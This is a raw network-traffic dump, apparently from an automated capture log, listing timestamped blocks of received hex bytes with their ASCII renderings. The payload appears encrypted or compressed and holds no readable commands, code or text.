                                                                                                                                                    2022-09-29 12:59:14 UTC26487INData Raw: 1f 54 08 ae c8 e3 d4 39 56 c5 2a 35 22 30 20 0d 11 8b 80 ff ff f5 08 3f e5 4e 93 cb c4 8d cd 33 fa 89 65 df 95 26 c6 a4 24 cb 1c dd af ff 7f c9 f8 26 56 24 92 4d 52 15 35 87 dc 6b 15 01 3f fd 51 53 d4 d7 7c 3d 27 82 9c c7 0c 98 a2 7e 7d 00 68 5e 89 97 51 15 ec 12 8d a4 fd 20 20 27 f1 5d d7 20 e2 65 e0 f0 7b 3a 7b 78 40 74 5d 00 2d d3 73 8f 3f 38 89 3d a5 02 c9 13 8f ef 95 2f 6c a8 18 e2 b8 b0 d4 d3 b0 7f 21 15 f2 17 3c a9 39 33 77 16 4a 6f 80 23 7d dd 48 6c 0a 65 a6 9b 93 cd 1d 17 eb fa 85 a1 88 ae 00 5f 98 92 7e 46 09 c2 00 a0 9d 43 e2 6a ea e4 69 9a 34 64 a3 ac 3a 96 38 32 4d 40 b7 49 7a ff ba dc fb 12 15 54 45 16 b9 6e 0f fb e1 a7 18 54 65 18 1d 99 7b 28 1e 1b a9 e9 f1 df 92 35 68 77 f9 38 5b e5 cf 64 74 6d 9b eb c5 b9 92 06 c4 15 30 28 fb b3 15 62 96
                                                                                                                                                    Data Ascii: T9V*5"0 ?N3e&$&V$MR5k?QS|='~}h^Q '] e{:{x@t]-s?8=/l!<93wJo#}Hle_~FCji4d:82M@IzTEnTe{(5hw8[dtm0(b
                                                                                                                                                    2022-09-29 12:59:14 UTC26503INData Raw: 51 c5 f8 1d 7a 50 aa 6f 12 d7 3a db 2c 4e f9 b0 3f 5d 58 43 81 18 2a 85 dd 0a 8b 05 59 af a7 41 3c 1b c5 38 57 ea 49 f7 16 68 92 fb 4a e7 ce 59 47 a5 7c 8c 82 4f 48 21 0d 5f 6a 53 89 95 d3 e1 ad eb 88 e6 7b 6f ae dc 7b e1 85 2a 46 32 fb 30 7f 48 83 60 8f ce c1 d5 3f 6f 06 84 75 54 88 d2 2c 6e 2b 74 2f 87 06 5b 99 f7 09 43 85 84 8e d3 56 32 0b 04 ff ae aa 3a de eb a1 68 ff a5 5f 88 23 c5 f9 54 83 5e b9 1a 95 7e 2b 98 fd 18 2d d9 95 e1 49 06 ef 06 ea 28 de d8 c2 ec 06 e3 d0 e0 db 0e 67 5b e7 16 5c 1b 1a d7 92 77 86 e4 37 55 ad 4e 46 e5 f1 1a 88 b5 fd 7c d0 ab 43 94 39 b0 be 9a 7c b7 9e 45 d7 25 39 4c c8 5d d6 6f 87 99 24 89 fc 8b f2 f5 06 e5 30 cd f1 ab a5 ac bc 3b e1 8d 11 c3 82 fe 55 45 21 a0 ca 9b f4 54 da ec a7 ac b0 e8 b3 58 29 04 93 90 89 92 c2 b3 a7
                                                                                                                                                    Data Ascii: QzPo:,N?]XC*YA<8WIhJYG|OH!_jS{o{*F20H`?ouT,n+t/[CV2:h_#T^~+-I(g[\w7UNF|C9|E%9L]o$0;UE!TX)
                                                                                                                                                    2022-09-29 12:59:14 UTC26519INData Raw: 18 0d 10 81 e6 d8 ce d5 f2 82 03 eb 06 b7 c0 20 f3 94 7b 52 98 fe fc 41 c1 1c 29 61 7b aa 78 7d 71 27 5a 05 61 bf be 20 23 66 af ab 98 e1 4e 96 b6 e2 12 ee d3 16 65 d9 22 6c 6c e3 61 70 f2 2d c7 ee 20 58 9c 1c f8 a1 2f 39 3c db a3 b0 bc e0 66 27 cf 7f ee 35 7f 96 89 3a 10 b0 74 14 05 18 da d0 9d 25 8a 4d 58 5c 90 56 a0 a9 89 dd e2 bb 36 ac 59 8a 91 05 f6 69 37 55 6d ec f5 ac d5 7d 8a fd 3d 50 91 7e 97 da 69 e4 26 90 2b 71 f9 de 6c d4 89 25 a7 4d 75 17 27 21 4e 60 e3 95 3e dc f1 24 88 42 aa ef 04 83 48 19 42 28 08 9c 58 20 a6 f3 2c a7 d5 2e 2c e7 6a 0e 4a db 29 d5 8f ba 70 ee ee f4 ba 18 94 1b b5 68 89 9b 71 31 5e 5c 2a b8 df b4 4d d2 38 e9 85 de 7b cc a1 2a 1c 78 5b d8 d0 9d b8 b6 97 d1 4e 77 38 95 a4 73 9f 71 fe 38 ab 18 ad cf ae 51 c8 0a 83 40 77 d8 0a
                                                                                                                                                    Data Ascii: {RA)a{x}q'Za #fNe"llap- X/9<f'5:t%MX\V6Yi7Um}=P~i&+ql%Mu'!N`>$BHB(X ,.,jJ)phq1^\*M8{*x[Nw8sq8Q@w
                                                                                                                                                    2022-09-29 12:59:14 UTC26535INData Raw: bb 51 9b 35 8f 92 30 9f bc 0b d8 a8 05 d4 3f e6 ec fc 29 8a 61 87 92 29 2e 0f 98 df c5 36 67 1c 85 19 c3 3e e1 8e 81 64 4b 5b f4 b9 ba ef 17 55 4b 08 8e 82 c7 29 66 8b e6 2b f7 1e 45 ea 15 c5 f9 93 cb a4 bd e1 26 74 65 3c 60 74 dc 88 28 c3 6e 86 4a dc 3a 40 83 7b 29 35 f4 7e 9f b3 49 ee 49 4b 24 28 44 3a be 07 b1 f4 fb 12 8c cd 6b cb c0 c7 e9 21 0e 4d 83 a7 d3 72 e0 46 09 54 c3 8d 82 3e 40 e4 b6 88 6c 11 1e 18 ba 74 29 f4 94 90 77 a1 70 6c c4 a3 6b b1 d1 e1 3c 97 65 70 3e e1 7a e2 5e 47 03 71 3a 58 91 24 e8 ab 11 4c 20 fb 99 ab 02 b2 65 08 80 73 32 87 12 89 56 15 d7 b2 69 78 bd 56 f7 b5 f4 d5 dd b7 6b 46 02 11 00 73 cc 75 0e b5 af 44 03 c4 61 d9 04 96 a5 dc fb 14 1d 27 0f cc 08 4f 2a a7 6f 19 b4 03 49 75 77 35 56 8a 95 03 5b c1 df 52 2f 42 30 bf d9 4a 18
                                                                                                                                                    Data Ascii: Q50?)a).6g>dK[UK)f+E&te<`t(nJ:@{)5~IIK$(D:k!MrFT>@lt)wplk<ep>z^Gq:X$L es2VixVkFsuDa'O*oIuw5V[R/B0J
                                                                                                                                                    2022-09-29 12:59:14 UTC26551INData Raw: 0f 40 f8 b0 4a 82 9c 90 66 ae d9 d9 88 2f f5 3f ab b6 8c 13 70 e6 af c2 56 c5 19 d2 d0 01 03 ca 27 8c a6 79 20 bc 5e fb e6 37 11 33 6a 8e b6 5f d4 8d f7 56 95 e0 17 15 b6 be 48 ee 5b 92 00 b3 cb 44 9a f6 c6 bc 16 b0 53 c7 c9 7b 1e 3b 4d 9d bb ec 0b 16 1f a5 53 1c 29 95 8a 78 9a cf b7 b4 70 31 3c 16 ca 48 fb c8 1e ef c4 4f 8e 21 51 f5 6c 36 90 03 aa b5 a3 d6 8a 05 f9 72 dd c3 05 8b ce 61 d8 71 64 83 c2 a2 78 14 f1 d9 62 10 90 e7 7e 26 2a e6 a8 7e f6 ab a8 e8 6a 55 0d c1 e5 6f e8 a8 62 fb 3e bf e8 ad a8 82 01 64 da d2 fc a2 f8 35 44 74 da d9 83 01 d7 b4 45 67 85 dc 27 4d 65 b3 82 ca 94 55 9f b2 39 ea 78 4a 1e 84 90 85 f5 37 38 e2 bb 85 7b e0 58 2b 50 b5 67 78 f6 0f 7f 70 be 67 25 17 0c ef 49 d9 1a 93 d5 82 a7 d2 34 c4 69 fa 71 72 f1 df c2 cf 8f f0 a3 41 24
                                                                                                                                                    Data Ascii: @Jf/?pV'y ^73j_VH[DS{;MS)xp1<HO!Ql6raqdxb~&*~jUob>d5DtEg'MeU9xJ78{X+Pgxpg%I4iqrA$
                                                                                                                                                    2022-09-29 12:59:14 UTC26567INData Raw: f5 f7 01 80 de c0 4e 37 cf eb fe 91 f0 4d f3 4b 1d 1b 15 07 56 21 18 ce 40 c2 e6 0d ff c2 25 41 a4 15 c5 4b 86 84 c2 92 7d df 10 1b f5 aa a7 7f c2 db a4 68 f8 19 75 b4 b1 f9 a4 ca 75 f6 6b f0 a5 f7 5c 05 dd a4 4a 15 96 c2 97 5a 75 18 0b c4 64 03 00 13 21 bd 96 9f 05 6f 24 4b 41 a3 b2 51 06 58 a0 a1 2b a3 b1 f5 90 d8 c9 76 82 fa 9f f8 60 c0 16 18 05 25 17 9c 55 d7 ee c4 c0 20 0a b1 a7 30 ed ce e9 c6 3b 64 f6 ce 66 ff 2b 6f 32 5f d6 ae 55 f3 9b 29 4c 8b 33 6c 88 3d 77 71 92 30 62 96 76 a4 04 5e 37 cd 4c 9c 94 35 eb 43 01 c7 06 bb 3f cb 12 0c 17 0d 48 ae 96 dc 4f b7 46 e3 9c c1 1e 17 cc fd dc 68 93 f2 4f 83 09 63 a4 91 34 af 47 99 25 a0 f5 4f 46 17 2f 6f e8 05 3b 1e 3c 88 b3 cd 20 ff d7 47 56 69 23 a3 fb ff 92 15 3c 6b b2 e7 14 e4 35 e6 75 cb e4 0e f5 a1 3a
                                                                                                                                                    Data Ascii: N7MKV!@%AK}huuk\JZud!o$KAQX+v`%U 0;df+o2_U)L3l=wq0bv^7L5C?HOFhOc4G%OF/o;< GVi#<k5u:
                                                                                                                                                    2022-09-29 12:59:14 UTC26583INData Raw: d4 6b eb 4a a3 19 16 1c 30 b6 3f 6d 9e 79 c1 3a f8 21 4c ec 19 d2 b7 ee 06 24 6c 9f 50 d0 c9 c5 76 fc 06 2a 45 9c 54 41 9c c8 e4 11 1f 43 31 25 44 6d 76 92 60 6d df 15 50 76 7a 20 c4 90 9a 45 e1 2d 9b e9 54 98 b2 99 de 4e ff 19 99 39 34 c7 7c 66 cd ff dc ba 42 48 5d a4 95 b8 ba 2e c4 0c c1 d1 9e 10 60 32 d4 d6 f4 22 02 e1 3a f1 20 35 72 6c 37 9d e5 86 c0 e1 43 b7 93 40 fd e8 f8 52 5e 73 b9 98 90 1c ef eb f5 11 d7 11 2d d2 d4 e9 39 62 b4 ad 80 20 ac 56 2b 40 97 bf 43 5d 85 49 7f c9 4d 30 4d 34 19 8e 5e 10 4e 10 3e d0 17 de 69 72 0e 04 07 ad 8f dd 87 54 ec 62 e9 48 ba 49 7b 55 f7 7c 3f 1f 57 59 7f a8 7c 03 eb f1 8b 30 86 ce 15 14 fc 68 b3 8c 82 15 7e bf b5 bd 2d 9e f0 b3 f9 0d bb 80 25 3f 26 01 6b 0c 64 d0 13 09 b8 ec 78 7e 98 29 87 a5 05 16 b9 24 a5 f0 88
                                                                                                                                                    Data Ascii: kJ0?my:!L$lPv*ETAC1%Dmv`mPvz E-TN94|fBH].`2": 5rl7C@R^s-9b V+@C]IM0M4^N>irTbHI{U|?WY|0h~-%?&kdx~)$
                                                                                                                                                    2022-09-29 12:59:14 UTC26599INData Raw: c4 b4 9f 9e 55 90 8e 51 43 e6 18 c9 0c 11 7e 5e be 21 1a 2f 7d a4 ce b6 1d 42 16 c6 ce 6d f1 9a 2a 30 34 72 94 4c b0 b7 5c 94 e8 c4 96 96 ad 1b 05 d6 19 25 87 4f 4a f9 c4 c1 48 f3 e4 e5 9f 3b a6 49 ad 48 9f 50 88 34 9d aa 47 33 fd 86 c1 45 35 2e a5 b6 e5 b2 61 33 70 66 ed d3 09 e6 6a 14 aa b5 48 e5 ed de 83 cc 79 3e d4 55 ee 22 64 90 d5 03 34 6c 51 38 9e 36 1c f4 77 f7 69 b8 ce 57 2d af 98 9f 5b 5a 80 c8 9c 6a 3c 84 a3 e4 cb 91 71 ac 70 97 02 72 54 53 37 8f 81 e1 3c 64 bc 0b dc 3f 58 5e 0c d2 d5 f9 c9 17 35 38 7a 59 2b 75 f9 34 59 0d a7 b1 96 99 3a 2e c8 8c 73 38 ea e4 68 7d fc c8 c8 11 9b 71 bc 92 84 83 67 ba f4 73 0e fc 63 0c 8b 01 1f 55 62 54 2f f0 b4 5c 4a d9 2c 7a b9 43 f1 4b 7c 64 fb b7 56 a4 52 35 01 21 f0 8e 8c 0d dc 55 98 50 1c b1 e0 2d 25 45 62
                                                                                                                                                    Data Ascii: UQC~^!/}Bm*04rL\%OJH;IHP4G3E5.a3pfjHy>U"d4lQ86wiW-[Zj<qprTS7<d?X^58zY+u4Y:.s8h}qgscUbT/\J,zCK|dVR5!UP-%Eb
                                                                                                                                                    2022-09-29 12:59:14 UTC26615INData Raw: b4 ee dc 26 6c 3e 7e 42 c2 41 6d 64 25 a3 76 9a 95 bf 35 f5 c3 6b f2 93 0c cc 02 2a eb 32 64 c7 e4 9a 6f c9 3e 87 27 8e ef 40 29 43 06 1f 7f f0 93 33 77 30 2e 70 be 6e 80 c1 40 35 4d f2 bd 89 e2 2f 4b ac 32 df 9d bd cc 5d cf 6d 7d 54 d9 7d b2 f4 fb 66 7e a0 15 54 43 85 e9 1b a5 15 e6 a5 5b f6 94 6d f9 7a 3f f3 35 a5 da 91 d4 37 a4 67 14 12 de 3e 18 1e 12 61 6f 1b cb 4c 48 23 6a a0 28 04 00 5a 1b 1a b6 5f 76 75 5d 1d 71 4c e3 ed ad 54 bd 30 e2 e4 a1 01 bc fc fd 96 21 21 f0 76 d1 21 f9 f0 49 8e d9 dd 5e a3 bf 9e 73 3c c7 2e 69 e4 9c db ca f9 d9 42 be 87 5a 2a d0 39 fa be 58 ec 32 26 02 c1 b9 7c 32 65 59 a6 25 b8 1f 4a 7d a8 7c 89 49 81 3c 86 6a 6c 4b 20 d6 fc 13 f7 af ac 69 24 f7 25 4b 5a a5 49 9c ab 01 f4 45 de 55 98 a9 af a3 04 5c 1e ca 2e 3d 24 47 5e 6d
                                                                                                                                                    Data Ascii: &l>~BAmd%v5k*2do>'@)C3w0.pn@5M/K2]m}T}f~TC[mz?57g>aoLH#j(Z_vu]qLT0!!v!I^s<.iBZ*9X2&|2eY%J}|I<jlK i$%KZIEU\.=$G^m
                                                                                                                                                    2022-09-29 12:59:14 UTC26631INData Raw: 49 89 cc 91 a6 a8 98 8f f3 5f 6a cb 69 1f 17 64 75 2c e9 28 ce 0b 62 59 37 2a 56 a7 c0 1c 9a c5 af 72 08 0b da 15 1b 06 97 f8 7f b0 42 41 3f de 52 b1 c0 ef 02 00 74 67 61 18 5b bb 5c 59 a0 7c 81 2d 2e 4a 66 41 84 bc a7 89 3f bc 6a 03 85 23 a6 b5 33 c4 51 6c f2 a2 40 c6 da fc 7e cc d2 fd 87 47 a1 05 62 81 60 7e 6e df 2e 98 ca f9 ed 60 3a 93 b1 9c 3d b8 da 69 8d 48 61 f7 ef 8c 92 27 97 a2 a1 28 1b 1d 42 fc 7c b0 e2 c6 3c 2b e7 d5 3f d0 8a b7 1d bd d9 26 30 06 12 d5 2d ec c1 b9 db 04 7f ab 67 40 43 76 41 bd 10 b4 27 ea 1d b9 ab 06 0c 08 f3 e4 d9 a8 93 6b f1 40 53 dc d5 a7 c3 a3 72 87 7c 6a 25 57 b3 44 39 30 7d ca 3d 3b 9b 8e 0a 85 d2 7e 48 1f 53 2b 13 f4 c0 b8 d7 24 53 56 20 aa 5a a1 b5 b2 4d 4e f6 01 d9 b9 6f a7 08 96 b9 14 24 d9 9b 7f b4 43 db 30 db b9 40
                                                                                                                                                    Data Ascii: I_jidu,(bY7*VrBA?Rtga[\Y|-.JfA?j#3Ql@~Gb`~n.`:=iHa'(B|<+?&0-g@CvA'k@Sr|j%WD90}=;~HS+$SV ZMNo$C0@
                                                                                                                                                    2022-09-29 12:59:14 UTC26647INData Raw: c9 1c ae 0e 23 9f 3e 55 9c af 38 99 3d e9 d7 d9 ed fe 65 c5 1a c6 b3 31 df 2e dd ec 86 df a0 a5 d4 05 60 1f 65 ce 33 31 ec 57 80 75 6c 97 69 db f6 0d 96 80 2b 11 4c bd ce f6 e1 d6 34 57 54 aa f5 a4 95 ba 2e bb 8e b7 a4 4a dc 9e 53 5a 7b 45 bf a0 74 10 bc 35 72 19 a4 e3 35 cf 2c cf 52 cd 5a e8 e1 77 b7 ac c7 62 1b 18 37 64 7e 70 06 cf 0b 14 ec 21 93 05 69 0a d9 b8 d1 e6 64 5a d6 92 a8 fb 5e c7 09 6e 7a 14 97 f7 a0 f0 c5 2d 03 87 86 76 00 09 8a 89 8a 85 b8 e9 0a 07 24 b4 f6 05 21 d7 5b b1 69 6f 36 ba 63 ab 42 7c 53 8d 7e b8 a6 e5 cb da cb bf 9e a5 8d b9 5a b2 89 bf 42 aa 2a 2e c8 ba a6 3b 18 94 f2 e4 e9 4e df 31 5a 6b 8c da 48 44 6b ad d0 f6 06 d1 55 9e 2a 3f 7f b4 d1 b2 f7 b8 ff ab 54 db 5f ef c7 da 1b 1d ff 82 8e 57 73 e1 44 c1 4c 4f 46 8f f1 eb 8f a8 fd
                                                                                                                                                    Data Ascii: #>U8=e1.`e31Wuli+L4WT.JSZ{Et5r5,RZwb7d~p!idZ^nz-v$![io6cB|S~ZB*.;N1ZkHDkU*?T_WsDLOF
                                                                                                                                                    2022-09-29 12:59:14 UTC26663INData Raw: 72 9d 86 1c 25 d7 bc c4 77 08 e3 ca b5 58 41 04 f3 13 47 c7 38 4d 9c 9b 11 20 07 62 09 9d 2d 57 ac e8 84 cc f3 e4 1c f0 32 63 af f1 d2 63 7c e7 9e 45 6e 9b f3 cb 7c c8 3b 2b 2f 60 04 42 6b cd 9d 18 2d 75 1c c8 f3 86 2a a7 71 ae 2d 24 a5 80 37 f7 a7 fa 05 b3 b7 a9 5f 24 7a 98 a2 9a 59 a6 e2 a5 e2 52 a2 c8 08 0a c7 c4 0d 56 d2 83 03 f8 67 63 76 07 be 1d 51 fc 89 96 73 fa be ee de 20 18 5d 7a 15 2b 06 15 65 d7 0d 2b 4a 00 ab 9b 0a bf aa b4 16 b5 c3 db 0d c1 e3 2e b4 a6 42 86 17 0e fc 3f 38 88 75 ce 37 27 b8 22 94 8d a9 bb e4 bf 03 80 b7 22 9f 96 ab 51 f7 f3 d0 4e 8d 7b c2 99 fa d9 f2 62 31 10 fc ea 74 8f 11 fe 8a 35 3d 96 e5 cf 96 bc d2 f7 33 a2 bd 3c 88 f2 50 e4 25 b4 8c 53 35 6e c7 f7 a3 83 f8 f2 70 a3 d6 e0 ea 80 d5 34 8a 33 db 1f 52 fd 0c ed 85 d6 94 71
                                                                                                                                                    Data Ascii: r%wXAG8M b-W2cc|En|;+/`Bk-u*q-$7_$zYRVgcvQs ]z+e+J.B?8u7'""QN{b1t5=3<P%S5np43Rq
                                                                                                                                                    2022-09-29 12:59:14 UTC26679INData Raw: e2 c4 0b 0b 19 23 9a 45 4d 9d 80 ed cd af 01 21 52 61 b2 19 d9 78 77 57 5b 4b f9 36 29 2a 1e 79 dd f9 d7 23 52 b7 7f bf 71 13 dd 95 41 ea b4 73 1e c8 b5 ed 16 2e d6 32 80 4d 7a 61 27 01 c8 64 f3 f9 71 8e 14 92 91 63 b3 17 19 d4 7e 34 d0 44 e7 bb 76 0f 93 cc 5c a2 f2 b0 70 7f 61 5b 83 df 20 ab 0f 4b 20 07 dc 60 66 a1 05 41 4e 2e cb db 42 db e0 6a 31 c3 ff c2 19 6e fd 5c c7 ac 31 f3 08 87 25 45 b4 38 53 64 c3 7d ac 08 ff 2f 51 2c bd 00 db 38 80 14 09 03 30 fb 77 d0 fe 9f 7d 69 92 bd ea 65 ef e3 25 26 5b b2 7c a3 74 aa 21 eb 53 f4 31 66 8a 22 d1 7f fb 22 20 85 da ef b6 5b 3b df 40 6a ab 0e c7 38 78 22 c4 86 db e5 e4 94 fb 45 d5 fb 52 d9 87 ae 17 00 c2 c4 d3 72 b4 6c d9 e1 ca 68 c1 74 38 c1 5f fd 96 18 ac e8 17 59 bc 4e ba 51 9e 65 96 6d 12 50 8d 84 19 50 b0
                                                                                                                                                    Data Ascii: #EM!RaxwW[K6)*y#RqAs.2Mza'dqc~4Dv\pa[ K `fAN.Bj1n\1%E8Sd}/Q,80w}ie%&[|t!S1f"" [;@j8x"ERrlht8_YNQemPP
                                                                                                                                                    2022-09-29 12:59:14 UTC26695INData Raw: 75 aa 22 a7 1e fe ad c5 f7 03 cf 92 bf 20 76 3d 45 66 f3 f1 f7 9f 03 99 55 ac f9 5e c4 c0 25 5b e7 f3 ae b6 56 95 d1 4c 8e 72 12 46 ad 77 b1 4f b2 dd a6 26 43 a2 e3 20 a4 72 fa 89 31 97 68 87 ca 00 2f 23 ae b7 fe 84 80 81 a5 f3 a7 50 f0 19 ec 3a 08 cc e0 84 45 00 68 9d a9 ec 43 7d ec 74 5b 75 d3 f3 0e 28 76 28 61 26 ef ea 92 09 e9 93 0f 33 be 6c 8a 3e 5d bd fc 30 75 b7 7e 4c fe a6 a9 23 7b ab 95 ad 2e 88 94 9b 04 91 7b eb 99 b6 5f 77 e0 d6 20 16 78 46 cc 40 03 85 8b a9 bd 7d df 8d 08 e1 b3 b6 f5 e8 c7 a9 f6 d5 91 f6 64 67 33 be ce c6 eb ee 8d 24 2d 7b f9 e5 3c 3a 9c e3 1e bd 5e d3 1a 7c 3a ee f7 aa 6a f3 ec c6 e8 ec 0e ec 36 0e c8 c1 50 2f 6c b8 a8 65 0b 2c 7e 98 3d c6 24 0d f4 d1 d8 95 33 e1 68 3a 6e f6 b8 17 ae 6b 36 49 69 bc c4 13 b7 c1 fd 14 fc 5a c6
                                                                                                                                                    Data Ascii: u" v=EfU^%[VLrFwO&C r1h/#P:EhC}t[u(v(a&3l>]0u~L#{.{_w xF@}dg3$-{<:^|:j6P/le,~=$3h:nk6IiZ
                                                                                                                                                    2022-09-29 12:59:14 UTC26711INData Raw: e3 7e 7a 01 76 3f ce df a8 49 fe 3e 11 4d 44 58 af 7c c1 6e b7 14 8d 38 3a a0 a6 1e 99 a7 26 06 bf a3 fc d8 6b 85 6c c1 e3 c4 77 ad 20 08 58 f0 3b 67 92 91 af 1b a9 b6 b5 12 7d 26 fe 03 27 00 3c ef c0 fd e0 c9 02 09 16 65 9c 45 98 78 35 bb f6 ad 01 f7 59 49 5c bf 2e e4 1f a1 d4 6d cc 2e 61 87 f0 5f c3 8e 1c b8 76 d0 92 c7 c2 b5 89 07 ea 9a 9c 54 d4 8f 6e 36 c6 50 db 83 6a e9 9f 3d 1a 67 85 8c b7 e1 59 d2 16 c1 71 c9 a8 93 44 eb c7 f5 ee 26 72 d2 66 5d 46 7d 78 35 18 35 7a 0a 60 85 a3 bf ca 0b 80 ed 26 f4 d7 aa 92 66 ed 83 95 f3 8e 8f 72 26 67 bf e0 0b aa 07 f2 a0 1d 07 e8 d0 54 d3 a5 ef 72 75 84 d9 d5 8b 4c 3e 70 7b e3 4c e5 43 e9 71 5c a0 7f 49 47 34 0c 59 2e c9 5d 44 34 8a 80 dc f2 d2 05 75 0a 36 fe 98 0d 28 24 4b 90 0f 05 3c 21 f1 5c a6 6b 5c e7 5b 21
                                                                                                                                                    Data Ascii: ~zv?I>MDX|n8:&klw X;g}&'<eEx5YI\.m.a_vTn6Pj=gYqD&rf]F}x55z`&fr&gTruL>p{LCq\IG4Y.]D4u6($K<!\k\[!
                                                                                                                                                    2022-09-29 12:59:14 UTC26727INData Raw: 94 a3 a3 a1 e9 c3 99 c0 95 7e 7d ed 36 92 63 77 3c a0 1c 0f 9e f8 47 9e b8 89 d8 c4 df 80 f2 7f e7 6f 5c 0f c0 52 c2 32 b2 83 4e f4 7f 0e 6f ce 39 69 0c ae fa 2d fb 48 fb eb c8 9b 76 68 fa a5 e9 26 35 ff 5d 6c a7 74 fb f5 48 4e 70 22 22 cd ee e7 bb 43 7b a0 0b 61 44 57 12 c2 2e a5 a2 76 0b ee c3 2f 87 8e 0c 18 97 f7 24 e6 12 3d f1 bf c6 ab fc 93 c3 ef 84 0f a6 be 09 d0 b7 42 b1 e8 59 82 60 f1 1a a6 46 62 b9 ce 83 cf fa c5 8c c9 a6 de a0 3e a0 c3 41 96 3c 0b 63 96 62 c7 08 22 64 79 ea 3a d2 1a c2 87 11 ee 74 2f 4a 15 b5 1b 24 a5 ed 0f 9e df 2d 86 51 74 6d 85 15 d6 b5 5b 57 05 e3 48 e2 89 27 23 35 44 af d4 b1 fb 74 d8 5f 7b 3f 14 b9 26 99 e2 89 c7 e1 7e 27 9c 99 b4 8c b5 9b 91 c7 41 88 8a ed 80 09 39 0f 7a ba e5 cb 1b d8 64 2b 75 96 dc 7b 1d 29 b5 fb 0f 2c
                                                                                                                                                    Data Ascii: ~}6cw<Go\R2No9i-Hvh&5]ltHNp""C{aDW.v/$=BY`Fb>A<cb"dy:t/J$-Qtm[WH'#5Dt_{?&~'A9zd+u{),
                                                                                                                                                    2022-09-29 12:59:14 UTC26743INData Raw: ac cd ea 0b 00 6c 80 71 2f 55 92 8a 4e 4a 21 6c d1 a2 19 28 ae e1 a0 7f 5b 80 7e eb 40 4a 5b 91 14 c4 59 c1 a1 97 42 9b 4c 76 77 0f b3 db b9 c9 b8 52 57 3f 68 df 09 9c 3b 45 4e db 2e 24 91 a4 73 9b 53 83 a0 9f dd 98 f5 10 85 7a 70 63 28 e6 fe 1c 42 af ef e4 2f f8 0d 43 20 c1 62 96 c8 6c 5a 86 37 20 10 30 8d 24 c0 59 17 df 6b 90 3d 45 ec c0 d8 e2 d6 84 f8 31 42 b5 c7 67 29 23 49 0d a7 f1 96 1b ac a6 63 d5 d4 1d 94 f0 16 3b a1 a1 3d 0b 36 f8 7d 7e f9 c3 9c 8f 26 df 7f 36 e0 5b 90 9e ee c8 2f 00 ee 42 51 a4 a4 04 de 5a 39 67 bc bc 02 37 a6 1e f0 16 d6 29 b4 d9 48 4c 2b 9a 67 9e a4 89 17 42 b9 97 06 58 e8 18 84 c7 fb 9c fd 10 8e cd e6 5c c0 df 43 7b 6b 40 53 98 ff e6 5f 34 f6 54 1f 92 a7 5a f2 56 46 da c7 14 0e 2a 43 8b 2a f4 64 7e be c5 3a 57 91 b1 b2 9b 46
                                                                                                                                                    Data Ascii: lq/UNJ!l([~@J[YBLvwRW?h;EN.$sSzpc(B/C blZ7 0$Yk=E1Bg)#Ic;=6}~&6[/BQZ9g7)HL+gBX\C{k@S_4TZVF*C*d~:WF
                                                                                                                                                    2022-09-29 12:59:14 UTC26759INData Raw: f9 45 cf 71 f5 83 52 40 b9 95 55 3d 12 a1 fa ae 62 7d cc ba 95 92 f5 e6 39 9d 6a 0c 35 5b 4f c2 2f a8 31 8d a6 ba 11 1c 88 33 8e 88 ab 6a 82 bd e5 a8 a1 a8 77 f7 36 60 23 22 9c 99 fd 8f e7 b3 ab b0 f1 aa 3c 31 6c a7 41 fb 8b 06 02 00 d5 43 9c 7a 8a de c1 46 37 fe f6 80 c2 81 08 33 12 61 9c fa 10 71 82 e7 65 7a 8e ea 44 c4 7f b4 d9 9e c1 92 af e6 a4 09 36 2b 06 e6 96 c4 23 e2 22 42 43 fb 86 37 de aa 20 ef 70 71 47 2b 5b 66 7f 8b 5f 45 da 44 ee 37 3b dd cb dd 47 01 78 5d 0d 62 23 47 d4 da ce 12 2b f1 b2 dc f7 a1 29 d7 af e2 3d 70 a0 13 97 36 dd 42 3e ac 7c 3d a0 7f f8 0a 4a d2 0c af da 19 95 3c 0d 6b 6f 5a da 79 cc e3 8e 8b 0d 19 8c 78 36 0b c0 70 20 dd 55 9f b1 02 9e 11 3b be 59 af 4a 4d 3f 57 02 92 ae c3 04 c5 6d 63 f8 e5 d7 28 79 6d 5b 2f 55 50 30 cd 79
                                                                                                                                                    Data Ascii: EqR@U=b}9j5[O/13jw6`#"<1lACzF73aqezD6+#"BC7 pqG+[f_ED7;Gx]b#G+)=p6B>|=J<koZyx6p U;YJM?Wmc(ym[/UP0y
                                                                                                                                                    2022-09-29 12:59:14 UTC26775INData Raw: 51 79 03 a3 1b 66 32 60 c0 e3 a4 0f b7 79 3d 5d 47 a2 3c 64 a8 01 b3 3a c3 68 50 95 c1 16 a1 2b ac 96 79 d8 1e ea c9 90 f6 47 7d cc 86 df 35 3e 3b 8b 83 0c c1 a6 21 d2 fe 06 da 1d b5 2b 52 3a 64 11 45 9e e9 81 ae d4 0c f8 9d bd 08 7c 5b 08 84 5c 89 ba 91 bc 90 b6 a6 38 21 59 8a 35 35 4c 77 16 b9 ab 33 b8 75 55 a8 00 34 89 c0 b8 79 af 49 45 ab 29 f1 f3 8a b7 7c 4b 60 f1 13 55 d6 44 95 0d 98 57 bb 94 29 65 1e 92 d2 32 a1 0a 19 50 56 86 b6 72 e7 51 b9 94 ee ec 0b 9e ad e4 52 02 bf 60 8f e7 6b 65 ce 35 38 37 3c 96 0d 5c 05 f2 9b c6 ca 6f df 11 d9 6d 35 62 b9 a8 54 79 f3 f7 81 b8 81 cd 16 d6 b5 ea 12 7a 9e 73 27 18 c6 06 e6 ea 07 d2 24 5c f0 75 c1 48 96 be a7 21 88 59 f2 a4 ad b0 88 8e 63 c6 b0 6b 0d cb 39 25 09 c4 c7 fb 99 ab 36 f9 25 aa f1 bb c7 4d 7f 16 8a
                                                                                                                                                    Data Ascii: Qyf2`y=]G<d:hP+yG}5>;!+R:dE|[\8!Y55Lw3uU4yIE)|K`UDW)e2PVrQR`ke587<\om5bTyzs'$\uH!Yck9%6%M
